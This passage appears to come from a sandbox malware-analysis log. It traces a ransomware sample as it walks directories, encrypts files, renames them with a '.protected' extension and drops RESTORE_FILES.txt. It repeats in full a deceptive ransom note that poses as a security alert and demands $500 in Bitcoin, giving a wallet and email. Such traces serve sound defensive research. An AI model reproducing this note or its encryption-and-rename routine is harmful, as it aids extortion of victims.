| out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0093.574] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0093.574] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0093.574] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.574] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0093.575] CloseHandle (hObject=0x14c) returned 1 [0093.575] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.575] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="Windows") returned -1 [0093.575] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="Program Files") returned -1 [0093.575] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="Program Files (x86)") returned -1 [0093.575] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="$Recycle.bin") returned 1 [0093.575] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="System Volume Information") returned -1 [0093.575] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 90 [0093.575] lstrcmpW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2=".") returned 1 [0093.575] lstrcmpW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="..") returned 1 [0093.576] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*") returned 92 [0093.576] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.576] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.576] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.576] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.576] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.576] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.576] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\.") returned 92 [0093.576] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.576] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.576] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.576] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.576] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.576] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.576] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.577] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.577] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.577] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.577] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.577] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.577] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\..") returned 93 [0093.577] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.577] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.577] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.577] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.577] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.577] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\.." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.577] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.577] lstrcmpiW (lpString1="WebSlices~", lpString2="Windows") returned -1 [0093.577] lstrcmpiW (lpString1="WebSlices~", lpString2="Program Files") returned 1 [0093.577] lstrcmpiW (lpString1="WebSlices~", lpString2="Program Files (x86)") returned 1 [0093.577] lstrcmpiW (lpString1="WebSlices~", lpString2="$Recycle.bin") returned 1 [0093.577] lstrcmpiW (lpString1="WebSlices~", lpString2="System Volume Information") returned 1 [0093.577] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 101 [0093.577] lstrcmpW (lpString1="WebSlices~", lpString2=".") returned 1 [0093.577] lstrcmpW (lpString1="WebSlices~", lpString2="..") returned 1 [0093.578] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*") returned 103 [0093.578] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0093.578] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.578] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.578] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.578] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.578] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.578] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\.") returned 103 [0093.578] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.578] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.579] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.579] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0093.579] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0093.579] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.579] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0093.579] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.579] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.579] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.579] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.579] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.579] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\..") returned 104 [0093.579] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.579] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.579] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.579] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.579] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0093.579] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0093.579] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\.." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.579] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0093.579] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="Windows") returned -1 [0093.579] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="Program Files") returned 1 [0093.582] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="Program Files (x86)") returned 1 [0093.582] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="$Recycle.bin") returned 1 [0093.582] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="System Volume Information") returned 1 [0093.582] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms") returned 128 [0093.582] StrStrIW (lpFirst="Web Slice Gallery~.feed-ms", lpSrch=".protected") returned 0x0 [0093.582] lstrcmpW (lpString1="Web Slice Gallery~.feed-ms", lpString2="RESTORE_FILES.txt") returned 1 [0093.582] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0093.582] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0093.582] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0093.582] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms") returned 128 [0093.582] StrStrW (lpFirst="Web Slice Gallery~.feed-ms", lpSrch=".txt") returned 0x0 [0093.582] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms") returned 128 [0093.582] StrStrW (lpFirst="Web Slice Gallery~.feed-ms", lpSrch=".rar") returned 0x0 [0093.582] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms") returned 128 [0093.582] StrStrW (lpFirst="Web Slice Gallery~.feed-ms", lpSrch=".zip") returned 0x0 [0093.582] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0093.585] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.585] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0093.586] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.586] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0093.586] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0093.586] CloseHandle (hObject=0x154) returned 1 [0093.586] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms.protected") returned 138 [0093.586] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms.protected")) returned 1 [0093.587] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0093.587] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0093.587] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\RESTORE_FILES.txt") returned 119 [0093.587] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.588] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.588] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0093.588] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0093.589] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0093.589] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.589] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0093.589] CloseHandle (hObject=0x150) returned 1 [0093.596] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.596] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.596] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\RESTORE_FILES.txt") returned 108 [0093.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.597] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.597] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0093.597] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0093.597] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0093.598] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.598] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0093.598] CloseHandle (hObject=0x14c) returned 1 [0093.598] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.599] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.599] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\RESTORE_FILES.txt") returned 68 [0093.599] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 